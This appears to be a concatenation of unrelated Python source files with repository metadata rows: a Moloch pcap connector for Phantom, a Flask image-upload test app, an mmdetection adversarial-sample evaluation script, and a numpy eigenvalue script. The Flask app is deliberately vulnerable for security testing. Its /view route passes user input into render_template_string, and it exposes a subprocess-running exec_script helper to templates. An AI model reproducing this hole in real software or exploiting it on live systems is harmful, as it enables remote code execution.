return RetVal(action_result.set_status(phantom.APP_ERROR, "Unable to parse JSON response. Error: {0}".
format(str(e))), None)
# Please specify the status codes here
if 200 <= response.status_code < 399:
return RetVal(phantom.APP_SUCCESS, resp_json)
# You should process the error returned in the json
message = "Error from server. Status Code: {0} Data from server: {1}".format(response.status_code,
response.text.replace('{', '{{').
replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_pcap_response(self, response, action_result):
""" This function is used to process pcap response.
:param response: response data
:param action_result: object of Action Result
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
"""
if 200 <= response.status_code < 399:
return RetVal(phantom.APP_SUCCESS, {})
message = "Error from server. Status Code: {0} Data from server: {1}".format(response.status_code,
response.text.replace('{', '{{').
replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_response(self, response, action_result):
""" This function is used to process html response.
:param response: response data
:param action_result: object of Action Result
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
"""
# store the r_text in debug data, it will get dumped in the logs if the action fails
if hasattr(action_result, 'add_debug_data') and (self.get_action_identifier() != "get_pcap" or not
(200 <= response.status_code < 399)):
action_result.add_debug_data({'r_status_code': response.status_code})
action_result.add_debug_data({'r_text': response.text})
action_result.add_debug_data({'r_headers': response.headers})
# Process each 'Content-Type' of response separately
# Process a json response
if 'json' in response.headers.get('Content-Type', ''):
return self._process_json_response(response, action_result)
if 'pcap' in response.headers.get('Content-Type', ''):
return self._process_pcap_response(response, action_result)
# Process an HTML resonse, Do this no matter what the API talks.
# There is a high chance of a PROXY in between phantom and the rest of
# world, in case of errors, PROXY's return HTML, this function parses
# the error and adds it to the action_result.
if 'html' in response.headers.get('Content-Type', ''):
return self._process_html_response(response, action_result)
# it's not content-type that is to be parsed, handle an empty response
if not response.text:
return self._process_empty_reponse(response, action_result)
# everything else is actually an error at this point
message = "Can't process response from server. Status Code: {0} Data from server: {1}".\
format(response.status_code, response.text.replace('{', '{{').replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _make_rest_call(self, endpoint, action_result, headers=None, params=None, data=None, method="get",
timeout=None):
""" Function that makes the REST call to the device. It's a generic function that can be called from various
action handlers.
:param endpoint: REST endpoint that needs to appended to the service address
:param action_result: object of ActionResult class
:param headers: request headers
:param params: request parameters
:param data: request body
:param method: GET/POST/PUT/DELETE (Default will be GET)
:param timeout: Timeout for API call
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message),
response obtained by making an API call
"""
resp_json = None
try:
request_func = getattr(requests, method)
except AttributeError:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Invalid method: {0}".format(method)), resp_json)
# Create a URL to connect to
try:
url = '{url}{endpoint}'.format(url=self._server_url, endpoint=endpoint)
except Exception:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Invalid URL. Please provide a valid URL"), resp_json)
try:
# In case of get_pcap action stream the response and store it into temp file
if self.get_action_identifier() == 'get_pcap':
r = request_func(url, auth=HTTPDigestAuth(self._username, self._password), json=data, headers=headers,
verify=self._verify_server_cert, timeout=timeout, params=params, stream=True)
# Create temp_file_path using asset_id
temp_file_path = '{dir}{asset}_temp_pcap_file'.format(dir=self.get_state_dir(),
asset=self.get_asset_id())
# If API call is success
if 200 <= r.status_code < 399:
# Store response into file
with open(temp_file_path, 'wb') as pcap_file:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
pcap_file.write(chunk)
else:
r = request_func(url, auth=HTTPDigestAuth(self._username, self._password), json=data, headers=headers,
verify=self._verify_server_cert, timeout=timeout, params=params)
except Exception as e:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. Details: {0}".
format(str(e))), resp_json)
return self._process_response(r, action_result)
def _handle_test_connectivity(self, param):
""" This function is used to test the connectivity of an asset with given credentials.
:param param: (not used in this method)
:return: status success/failure
"""
action_result = self.add_action_result(ActionResult(dict(param)))
self.save_progress(MOLOCH_TEST_CONNECTION)
# Validate port
if not str(self._port).isdigit() or int(self._port) not in list(range(0, 65536)):
self.save_progress(MOLOCH_TEST_CONNECTIVITY_FAILED)
return action_result.set_status(phantom.APP_ERROR, status_message='{}. {}'.format(
MOLOCH_CONNECTING_ERROR_MSG, MOLOCH_INVALID_CONFIG_PORT))
params = {'length': 1}
endpoint = ':{port}{endpoint}'.format(port=self._port, endpoint=MOLOCH_TEST_CONNECTIVITY_ENDPOINT)
# make REST call
ret_val, response = self._make_rest_call(endpoint=endpoint, params=params, action_result=action_result,
timeout=MOLOCH_TEST_CONNECTIVITY_TIMEOUT)
if phantom.is_fail(ret_val):
self.save_progress(MOLOCH_TEST_CONNECTIVITY_FAILED)
return action_result.get_status()
self.save_progress(MOLOCH_TEST_CONNECTIVITY_PASSED)
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_pcap(self, param):
""" This function is used to get pcap file and store it into vault.
:param param: Dictionary of input parameters
:return: status success/failure
"""
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
action_result = self.add_action_result(ActionResult(dict(param)))
summary = action_result.update_summary({})
# Validate port
if not str(self._port).isdigit() or int(self._port) not in list(range(0, 65536)):
self.debug_print(MOLOCH_INVALID_CONFIG_PORT)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_CONFIG_PORT)
# Get parameters
start_time = param[MOLOCH_JSON_START_TIME]
end_time = param[MOLOCH_JSON_END_TIME]
source_ip = param.get(MOLOCH_JSON_SOURCE_IP)
dest_ip = param.get(MOLOCH_JSON_DESTINATION_IP)
hostname = param.get(MOLOCH_JSON_HOSTNAME)
custom_query = param.get(MOLOCH_JSON_CUSTOM_QUERY)
limit = param.get(MOLOCH_JSON_LIMIT, 50)
# Validate start_time parameter
try:
start_time = int(float(start_time))
except:
self.debug_print(MOLOCH_INVALID_START_TIME)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_START_TIME)
# Validate end_time parameter
try:
end_time = int(float(end_time))
except:
self.debug_print(MOLOCH_INVALID_END_TIME)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_END_TIME)
# Compare value of start_time and end_time
if start_time >= end_time:
self.debug_print(MOLOCH_INVALID_TIME_RANGE)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_TIME_RANGE)
# Validate parameter limit
try:
limit = int(float(limit))
except:
self.debug_print(MOLOCH_INVALID_LIMIT_MSG)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_LIMIT_MSG)
# Validate parameter limit
if limit not in list(range(0, 2000001)):
self.debug_print(MOLOCH_INVALID_LIMIT_MSG)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_LIMIT_MSG)
params = dict()
params['length'] = limit
params['startTime'] = start_time
params['stopTime'] = end_time
expression = ''
expressions = []
# Add source_ip to expression, if available
if source_ip:
expression = 'ip.src == {source_ip}'.format(source_ip=source_ip)
expressions.append(expression)
# Add dest_ip to expression, if available
if dest_ip:
expression = 'ip.dst == {dst_ip}'.format(dst_ip=dest_ip)
expressions.append(expression)
# Add hostname to expression, if available
if hostname:
expression = 'host.http == {hostname}'.format(hostname=hostname)
expressions.append(expression)
# Add custom_query to expression, if available
if custom_query:
expression = custom_query
expressions.append(expression)
expression = " && ".join(expressions)
if expression:
params['expression'] = expression
endpoint = ':{port}{endpoint}'.format(port=self._port, endpoint=MOLOCH_GET_PCAP_ENDPOINT)
# make REST call
ret_val, response = self._make_rest_call(endpoint=endpoint, action_result=action_result, params=params)
if phantom.is_fail(ret_val):
return action_result.get_status()
# Create filename using input parameters
filename = 'moloch_{start_time}_{end_time}'.format(start_time=start_time, end_time=end_time)
inputs = [('src_ip', source_ip), ('dst_ip', dest_ip), ('hostname', hostname)]
for input_key, input_val in inputs:
if input_val:
filename = '{filename}_{input_key}_{input_val}'.format(filename=filename, input_key=input_key, input_val=input_val)
filename = '{filename}_limit_{limit}'.format(filename=filename, limit=limit)
filename = '{filename}.pcap'.format(filename=filename)
temp_file_path = '{dir}{asset}_temp_pcap_file'.format(dir=self.get_state_dir(), asset=self.get_asset_id())
# If file size is zero
if not os.path.getsize(temp_file_path):
# Delete file
os.unlink(temp_file_path)
self.debug_print(MOLOCH_NO_DATA_FOUND_MSG)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_NO_DATA_FOUND_MSG)
# Check if file is text file
# mime=True only returns mimetypes instead of textual description
magic_obj = magic.Magic(mime=True)
file_type = magic_obj.from_file(temp_file_path)
if file_type == 'text/plain':
with open(temp_file_path) as temp_file:
temp_file_data = temp_file.read()
message = 'Error while getting data from server. {api_message}'.\
format(api_message=temp_file_data)
self.debug_print(message)
return action_result.set_status(phantom.APP_ERROR, status_message=message)
invalid_chars = r'[]<>/\():;"\'|*()`~!@#$%^&+={}?,'
# Remove special character defined in invalid_chars form filename
try:
filename = filename.translate(None, invalid_chars)
except:
# For Python v3 translate function expects a table for replacing the characters
translate_table = {}
for invalid_char in invalid_chars:
translate_table[ord(invalid_char)] = None
filename = filename.translate(translate_table)
_, _, vault_file_list = ph_rules.vault_info(file_name=filename)
vault_file_list = list(vault_file_list)
# Iterate through files of Vault
for file in vault_file_list:
# If file name and file size are same file is duplicate
if file.get('name') == filename and file.get('size') == os.path.getsize(temp_file_path):
self.debug_print(MOLOCH_FILE_ALREADY_AVAILABLE)
vault_file_details = {
phantom.APP_JSON_SIZE: file.get('size'),
phantom.APP_JSON_VAULT_ID: file.get('vault_id'),
'file_name': filename
}
summary['vault_id'] = file.get('vault_id')
# Delete temp file
os.unlink(temp_file_path)
action_result.add_data(vault_file_details)
return action_result.set_status(phantom.APP_SUCCESS)
vault_file_details = {phantom.APP_JSON_SIZE: os.path.getsize(temp_file_path)}
# Adding file to vault
success, _, vault_id = ph_rules.vault_add(file_location=temp_file_path, container=self.get_container_id(), file_name=filename,
metadata=vault_file_details)
# Updating report data with vault details
if not success:
self.debug_print('Error while adding the file to vault')
return action_result.set_status(phantom.APP_ERROR, status_message='Error while adding the file to vault')
vault_file_details[phantom.APP_JSON_VAULT_ID] = vault_id
vault_file_details['file_name'] = filename
action_result.add_data(vault_file_details)
summary['vault_id'] = vault_file_details['vault_id']
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_list_fields(self, param):
""" This function is used to list all fields.
:param param: dictionary of input parameters
:return: status success/failure
"""
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
action_result = self.add_action_result(ActionResult(dict(param)))
port = param.get(MOLOCH_PARAM_PORT, 9200)
# Validate port
if not str(port).isdigit() or int(port) not in list(range(0, 65536)):
self.debug_print(MOLOCH_INVALID_PARAM_PORT)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_PARAM_PORT)
endpoint = ':{port}{endpoint}'.format(port=port, endpoint=MOLOCH_LIST_FIELDS_ENDPOINT)
# make REST call
ret_val, response = self._make_rest_call(endpoint=endpoint, action_result=action_result)
# Something went wrong
if phantom.is_fail(ret_val):
message = action_result.get_message()
self.debug_print(message)
if "Status Code: 200" in message and "angular.module" in message:
action_result.set_status(phantom.APP_ERROR, "Unable to connect to server. "
"Please make sure that entered port is correct")
return action_result.get_status()
# Add data to action_result
for content in response.get("hits", {}).get("hits", []):
action_result.add_data(content)
summary = action_result.update_summary({})
summary['total_fields'] = action_result.get_data_size()
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_list_files(self, param):
""" This function is used to list all files.
:param param: (not used in this method)
:return: status success/failure
"""
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
action_result = self.add_action_result(ActionResult(dict(param)))
# Validate port
if not str(self._port).isdigit() or int(self._port) not in list(range(0, 65536)):
self.debug_print(MOLOCH_INVALID_CONFIG_PORT)
return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_CONFIG_PORT)
endpoint = ':{port}{endpoint}'.format(port=self._port, endpoint=MOLOCH_LIST_FILES_ENDPOINT)
# make REST call
ret_val, response = self._make_rest_call(endpoint=endpoint, action_result=action_result)
# Something went wrong
if phantom.is_fail(ret_val):
message = action_result.get_message()
self.debug_print(message)
return action_result.get_status()
# Add data to action_result
for content in response["data"]:
action_result.add_data(content)
summary = action_result.update_summary({})
summary['total_files'] = action_result.get_data_size()
return action_result.set_status(phantom.APP_SUCCESS)
def handle_action(self, param):
""" This function gets current action identifier and calls member function of its own to handle the action.
:param param: dictionary which contains information about the actions to be executed
:return: status success/failure
"""
self.debug_print("action_id", self.get_action_identifier())
# Dictionary mapping each action with its corresponding actions
action_mapping = {
'test_connectivity': self._handle_test_connectivity,
'get_pcap': self._handle_get_pcap,
'list_files': self._handle_list_files,
'list_fields': self._handle_list_fields
}
action = self.get_action_identifier()
action_execution_status = phantom.APP_SUCCESS
if action in list(action_mapping.keys()):
action_function = action_mapping[action]
action_execution_status = action_function(param)
return action_execution_status
def finalize(self):
""" This function gets called once all the param dictionary elements are looped over and no more handle_action
calls are left to be made. It gives the AppConnector a chance to loop through all the results that were
accumulated by multiple handle_action function calls and create any summary if required. Another usage is
cleanup, disconnect from remote devices etc.
:return: status (success/failure)
"""
self.save_state(self._state)
return phantom.APP_SUCCESS
if __name__ == '__main__':
import argparse
import sys
import pudb
pudb.set_trace()
argparser = argparse.ArgumentParser()
argparser.add_argument('input_test_json', help='Input Test JSON file')
argparser.add_argument('-u', '--username', help='username', required=False)
argparser.add_argument('-p', '--password', help='password', required=False)
argparser.add_argument('-v', '--verify', action='store_true', help='verify', required=False, default=False)
args = argparser.parse_args()
session_id = None
username = args.username
password = args.password
verify = args.verify
if username is not None and password is None:
# User specified a username but not a password, so ask
import getpass
password = getpass.getpass("Password: ")
if username and password:
login_url = BaseConnector._get_phantom_base_url() + "login"
try:
print("Accessing the Login page")
r = requests.get(login_url, verify=verify, timeout=MOLOCH_DEFAULT_TIMEOUT)
csrftoken = r.cookies['csrftoken']
data = dict()
data['username'] = username
data['password'] = password
data['csrfmiddlewaretoken'] = csrftoken
headers = dict()
headers['Cookie'] = 'csrftoken={}'.format(csrftoken)
headers['Referer'] = login_url
print("Logging into Platform to get the session id")
r2 = requests.post(login_url, verify=verify, data=data, headers=headers, timeout=MOLOCH_DEFAULT_TIMEOUT)
session_id = r2.cookies['sessionid']
except Exception as e:
print("Unable to get session id from the platform. Error: {}".format(str(e)))
sys.exit(1)
if len(sys.argv) < 2:
print("No test json specified as input")
sys.exit(0)
with open(sys.argv[1]) as f:
in_json = f.read()
in_json = json.loads(in_json)
print(json.dumps(in_json, indent=4))
connector = MolochConnector()
connector.print_progress_message = True
if session_id is not None:
in_json['user_session_token'] = session_id
ret_val = connector._handle_action(json.dumps(in_json), None)
print(json.dumps(json.loads(ret_val), indent=4))
sys.exit(0)
| 41.460741
| 134
| 0.643393
| 3,418
| 27,986
| 5.034523
| 0.145114
| 0.061367
| 0.031613
| 0.03417
| 0.447931
| 0.40086
| 0.371746
| 0.345188
| 0.342631
| 0.31218
| 0
| 0.005876
| 0.270314
| 27,986
| 674
| 135
| 41.522255
| 0.836786
| 0.221003
| 0
| 0.256906
| 0
| 0.013812
| 0.087072
| 0.006712
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044199
| false
| 0.033149
| 0.044199
| 0.002762
| 0.21547
| 0.063536
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7574fa5420556c5e1887475cd923bc9a0ffab1f4
| 2,600
|
py
|
Python
|
testing/python-image-upload/upload.py
|
pkalauner-tuwien/polyglot-and-ambiguous-files
|
109eb7d5533de4a053841313e7c14918f9cd9df0
|
[
"MIT"
] | null | null | null |
testing/python-image-upload/upload.py
|
pkalauner-tuwien/polyglot-and-ambiguous-files
|
109eb7d5533de4a053841313e7c14918f9cd9df0
|
[
"MIT"
] | 1
|
2021-03-23T20:13:21.000Z
|
2021-03-23T20:13:21.000Z
|
testing/python-image-upload/upload.py
|
pkalauner-tuwien/polyglot-and-ambiguous-files
|
109eb7d5533de4a053841313e7c14918f9cd9df0
|
[
"MIT"
] | null | null | null |
from flask import *
from flask_csp.csp import csp_header, csp_default
import imghdr
import os
import hashlib
import subprocess
app = Flask(__name__)
app.config["UPLOAD_DIRECTORY"] = 'uploads'
app.config["ALLOWED_EXTENSIONS"] = ["jpg", "jpeg", "png", "gif"]
# Remove report-uri from default CSP header
h = csp_default()
h.update({'report-uri':""})
@app.route('/')
@app.route('/upload')
@csp_header()
def index():
return render_template("upload.html")
@app.route('/upload', methods = ['POST'])
@csp_header()
def upload():
f = request.files['file']
# Check extension
if not "." in f.filename:
return render_template("upload.html", msg="The selected file has an invalid extension.")
name, ext = f.filename.rsplit(".", 1)
ext = ext.lower()
if ext not in app.config["ALLOWED_EXTENSIONS"]:
return render_template("upload.html", msg="The selected file has an invalid extension.")
hashed_name = hashlib.md5(name.encode("utf-8")).hexdigest()
path = os.path.join(app.config["UPLOAD_DIRECTORY"], "{}.{}".format(hashed_name, ext))
# Append number if file already exists
id = 1
while os.path.isfile(path):
path = os.path.join(app.config["UPLOAD_DIRECTORY"], "{}_{}.{}".format(hashed_name, id, ext))
id += 1
f.save(path)
# Check file content so only changing extension cannot bypass the check
if imghdr.what(path).lower() not in app.config["ALLOWED_EXTENSIONS"]:
os.remove(path)
return render_template("upload.html", msg="The selected file is not an image.")
return render_template("upload.html", msg="Upload successful!", imagepath = path)
@app.route('/view')
@csp_header()
def view():
imagepath = request.args.get('image')
if not os.path.isfile(imagepath):
# Vulnerable, see method below
template = "{% extends 'index.html' %}{% block content %}<h4>Image " + imagepath + " does not exist.</h4>{% endblock %}"
return render_template_string(template)
return render_template("view.html", imagepath=imagepath)
# PoC method to show why attackers should not be able to upload arbitrary code.
# This method should obviously not exist in a real application, but code execution could also be achieved through other, more sophisticated ways.
def exec_script(file):
return subprocess.check_output(['python3', file])
app.jinja_env.globals['exec_script'] = exec_script # Allow usage in templates
@app.route('/uploads/<filename>')
@csp_header()
def send_file(filename):
return send_from_directory(app.config["UPLOAD_DIRECTORY"], filename)
| 34.666667
| 145
| 0.687308
| 352
| 2,600
| 4.965909
| 0.380682
| 0.036041
| 0.080092
| 0.074371
| 0.239703
| 0.22254
| 0.168192
| 0.168192
| 0.168192
| 0.140732
| 0
| 0.003712
| 0.171154
| 2,600
| 74
| 146
| 35.135135
| 0.807425
| 0.169231
| 0
| 0.115385
| 0
| 0
| 0.246397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096154
| false
| 0
| 0.115385
| 0.057692
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7577e2f7df5f804c676013417ab035ff063a393c
| 8,767
|
py
|
Python
|
test.py
|
AllenChen1998/RAD
|
9778e2576e427a26b2181561648f82162237a7dd
|
[
"MIT"
] | 1
|
2021-08-05T04:08:15.000Z
|
2021-08-05T04:08:15.000Z
|
test.py
|
AllenChen1998/RAD
|
9778e2576e427a26b2181561648f82162237a7dd
|
[
"MIT"
] | null | null | null |
test.py
|
AllenChen1998/RAD
|
9778e2576e427a26b2181561648f82162237a7dd
|
[
"MIT"
] | null | null | null |
import os
import cv2
import json
import time
import shutil
import argparse
import numpy as np
import PIL.Image
from copy import deepcopy
import mmcv
from mmdet.apis import init_detector, inference_detector, show_result
# install mmdet v1 in https://github.com/open-mmlab/mmdetection
# download correspongding pretrained models from https://mmdetection.readthedocs.io/en/latest/model_zoo.html
config_dir = 'configs'
config_files = {
'ssd': config_dir + '/ssd512_coco.py',
'faster_rcnn': config_dir + '/faster_rcnn_r101_fpn_1x.py',
'mask_rcnn': config_dir + '/mask_rcnn_x101_64x4d_fpn_1x.py',
'retinanet': config_dir + '/retinanet_r101_fpn_1x.py',
'cascade_rcnn': config_dir + '/cascade_rcnn_r101_fpn_1x.py',
'cascade_mask_rcnn': config_dir + '/cascade_mask_rcnn_x101_64x4d_fpn_1x.py',
'htc': config_dir + '/htc/htc_x101_64x4d_fpn_20e_16gpu.py',
}
config_files_ori = deepcopy(config_files)
checkpoint_dir = 'models'
checkpoint_files = {
'ssd': checkpoint_dir + '/ssd512_coco_vgg16_caffe_120e_20181221-d48b0be8.pth',
'faster_rcnn': checkpoint_dir + '/faster_rcnn_r101_fpn_2x_20181129-73e7ade7.pth',
'mask_rcnn': checkpoint_dir + '/mask_rcnn_x101_64x4d_fpn_1x_20181218-cb159987.pth',
'retinanet': checkpoint_dir + '/retinanet_r101_fpn_2x_20181129-72c14526.pth',
'cascade_rcnn': checkpoint_dir + '/cascade_rcnn_r101_fpn_20e_20181129-b46dcede.pth',
'cascade_mask_rcnn': checkpoint_dir + '/cascade_mask_rcnn_x101_64x4d_fpn_20e_20181218-630773a7.pth',
'htc': checkpoint_dir + '/htc_x101_64x4d_fpn_20e_20190408-497f2561.pth',
}
model_order = list(config_files.keys())
assert model_order == list(checkpoint_files.keys())
paths = {'Annot': 'COCO/annotations', 'mmdet': 'mmdetection/tools/test.py'}
for key in paths: assert os.path.exists(paths[key]), paths[key] + ' does not exist'
for key in config_files: assert os.path.exists(config_files[key]), config_files[key] + ' does not exist'
for key in checkpoint_files: assert os.path.exists(checkpoint_files[key]), checkpoint_files[key] + ' does not exist'
dirs = ['adv', 'cache', 'index', 'detection']
mask = ['mask_rcnn', 'cascade_mask_rcnn', 'htc']
def calculate_rmse(dir_name):
# calculate the RMSE for all samples
rmses = []
for root, _, files in os.walk(dir_name):
if 'sample_adv.png' not in files or 'sample_ori.png' not in files: continue#print('Not found in', root); continue
adv = np.array(PIL.Image.open(root + '/sample_adv.png')).astype(np.float32)
ori = np.array(PIL.Image.open(root + '/sample_ori.png').resize((adv.shape[1], adv.shape[0]))).astype(np.float32)
rmse = np.sqrt(np.mean(np.square(adv-ori)))
if rmse < 20: rmses.append(rmse)
print('RMSE is %.3f in %d samples' % (sum(rmses)/(len(rmses)+0.001), len(rmses)))
def re_annotation(dir_name):
data = json.load(open(paths['Annot'] + '/instances_val2017.json', 'r', encoding='utf-8'))
scales = {}
size = 416 if ('MaskRCNN' not in dir_name) else 448
existing = [] # record the existing samples
for file in os.listdir(dir_name + '/' + dirs[0]): existing.append(file)
# record the resized scale for each sample
abandoned = []
for i in range(len(data['images'])):
new_name = data['images'][i]['file_name'][:-4] + '.png'
if new_name not in existing: abandoned.append(i)
data['images'][i]['file_name'] = new_name
ih, iw = data['images'][i]['height'], data['images'][i]['width']
scale = min(size/ih, size/iw)
data['images'][i]['height'], data['images'][i]['width'] = int(ih*scale), int(iw*scale)
scales[data['images'][i]['id']] = scale
for i, index in enumerate(abandoned): data['images'].remove(data['images'][index-i])
# resize the annotations for detection and segmentation
abandoned = []
for i in range(len(data['annotations'])):
image_id = data['annotations'][i]['image_id']
scale = scales[image_id]
new_name = str(image_id).zfill(12) + '.png'
if new_name not in existing: abandoned.append(i)
for j in range(len(data['annotations'][i]['segmentation'])):
try:
data['annotations'][i]['segmentation'][j] = list(np.array(data['annotations'][i]['segmentation'][j])*scale)
except KeyError: continue
data['annotations'][i]['area'] = data['annotations'][i]['area'] * (scale ** 2)
data['annotations'][i]['bbox'] = list(np.array(data['annotations'][i]['bbox']) * scale)
for i, index in enumerate(abandoned): data['annotations'].remove(data['annotations'][index-i])
result_dir = dir_name + '/' + dirs[1]
os.makedirs(result_dir, exist_ok=True)
json.dump(data, open(result_dir + '/instances_val2017_resized.json', 'w', encoding='utf-8'))
def change_config(model_name, dir_name):
global config_files, config_files_ori
# change the config files to test the generated adversarial samples
ori_config = config_files_ori[model_name]
py_file = open(ori_config, 'r').read()
py_file = py_file.replace("data_root + 'val2017/'", "'" + dir_name + "/" + dirs[0] + "'")
py_file = py_file.replace("data_root + 'annotations/instances_val2017.json'", "'" + dir_name + "/" + dirs[1] + "/instances_val2017_resized.json'")
new_config = dir_name + '/' + dirs[1] + '/' + os.path.basename(config_files_ori[model_name])
with open(new_config, 'w') as f: f.write(py_file)
config_files[model_name] = new_config
def test_index(model_name, dir_name, metric='bbox', unique_metric=False):
# test the performance of mmdetection models on adversarial samples
if 'MaskRCNN' in dir_name and model_name == 'mask_rcnn': return
result_dir = dir_name + '/' + dirs[2]
os.makedirs(result_dir, exist_ok=True)
file_name = 'test.py' if not unique_metric else 'test_ours.py'
command = 'python mmdetection/tools/%s %s %s --out %s --eval %s' % \
(file_name, config_files[model_name], checkpoint_files[model_name], result_dir + '/' + model_name + '.pickle', metric if (model_name not in mask or unique_metric) else (metric + ' segm'))
print(command)
os.system(command)
def test_bbox(model_name, dir_name, sample_num):
# generate visual results for sample_num samples
source_dir = dir_name + '/' + dirs[0]
result_dir = dir_name + '/' + dirs[3] + '/' + model_name
os.makedirs(result_dir, exist_ok=True)
config_file = config_files[model_name]
checkpoint_file = checkpoint_files[model_name]
model = init_detector(config_file, checkpoint_file, device='cuda:0')
model_id, model_num = model_order.index(model_name) + 1, len(model_order)
for i, file in enumerate(sorted(os.listdir(source_dir), key=lambda x: int(os.path.splitext(os.path.splitext(x)[0])[0]))):
if i >= sample_num: break
img = source_dir + '/' + file
try:
result = inference_detector(model, img)
final = show_result(img, result, model.CLASSES, show=False)
except: continue
PIL.Image.fromarray(final[:, :, ::-1]).save(result_dir + '/' + os.path.splitext(file)[0] + '.png')
print('[ Model %d/%d %s ] [ No %d/%d ] [ File %s ]' % (model_id, model_num, model_name, i+1, sample_num, file), end='\r')
def test_pipeline():
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
parser.add_argument('dataset', type=str, help='dir name of the tested experiment')
parser.add_argument('gpu_id', help='GPU(s) used')
args, _ = parser.parse_known_args()
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
assert os.path.exists(args.dataset)
print('Calculating RMSE for', args.dataset, 'with', len(os.listdir(args.dataset + '/' + dirs[0])), 'samples...')
calculate_rmse(args.dataset)
re_annotation(dir_name=args.dataset) # resize annotations for existing adversarial samples to dir_name/dirs[1]/instances_val2017_resized.json
# change paths in config file and saved in dir_name/dirs[1]/.py
for model_name in config_files: change_config(model_name=model_name, dir_name=args.dataset)
# run mAP, mAR for samples to dir_name/dirs[2]
for model_name in config_files: test_index(model_name=model_name, dir_name=args.dataset)
# get bbox detection result images in dir_name/dirs[3]/model_name
for model_name in config_files: test_bbox(model_name=model_name, dir_name=args.dataset, sample_num=500)
# run accuracy, IoU for samples to dir_name/dirs[2]
for model_name in config_files: test_index(model_name=model_name, dir_name=args.dataset, unique_metric=True)
if __name__ == "__main__":
test_pipeline()
| 50.97093
| 196
| 0.677883
| 1,253
| 8,767
| 4.509178
| 0.215483
| 0.046195
| 0.02531
| 0.019823
| 0.304248
| 0.200708
| 0.179292
| 0.100177
| 0.060177
| 0.047788
| 0
| 0.034827
| 0.17794
| 8,767
| 172
| 197
| 50.97093
| 0.749133
| 0.09878
| 0
| 0.068182
| 0
| 0.007576
| 0.218406
| 0.087622
| 0
| 0
| 0
| 0
| 0.037879
| 1
| 0.045455
| false
| 0
| 0.083333
| 0
| 0.128788
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757912d9e4012e01b625eaf478b57827dc9d6ad6
| 415
|
py
|
Python
|
la/oblas/data/dgeev01.py
|
wtsia/gosl
|
8302f76dfe76d24ea5026b225bdad234383dacf9
|
[
"BSD-3-Clause"
] | 1,811
|
2015-05-21T12:47:27.000Z
|
2022-03-24T04:48:00.000Z
|
la/oblas/data/dgeev01.py
|
wtsia/gosl
|
8302f76dfe76d24ea5026b225bdad234383dacf9
|
[
"BSD-3-Clause"
] | 42
|
2016-09-29T05:23:28.000Z
|
2021-10-30T03:12:00.000Z
|
la/oblas/data/dgeev01.py
|
wtsia/gosl
|
8302f76dfe76d24ea5026b225bdad234383dacf9
|
[
"BSD-3-Clause"
] | 171
|
2015-07-14T07:50:35.000Z
|
2022-03-09T10:04:15.000Z
|
import numpy as np
import scipy.linalg as la
from auxiliary import *
a = np.matrix([
[+0.35, +0.45, -0.14, -0.17],
[+0.09, +0.07, -0.54, +0.35],
[-0.44, -0.33, -0.03, +0.17],
[+0.25, -0.32, -0.13, +0.11],
], dtype=float)
w, vl, vr = la.eig(a, left=True, right=True)
vprintC('w', w)
print
for i in range(4):
vprintC('vl%d'%i, vl[:,i])
print
for i in range(4):
vprintC('vr%d'%i, vr[:,i])
| 18.043478
| 44
| 0.53253
| 86
| 415
| 2.569767
| 0.5
| 0.027149
| 0.036199
| 0.099548
| 0.217195
| 0.217195
| 0.217195
| 0
| 0
| 0
| 0
| 0.151515
| 0.204819
| 415
| 22
| 45
| 18.863636
| 0.518182
| 0
| 0
| 0.235294
| 0
| 0
| 0.021687
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0.294118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
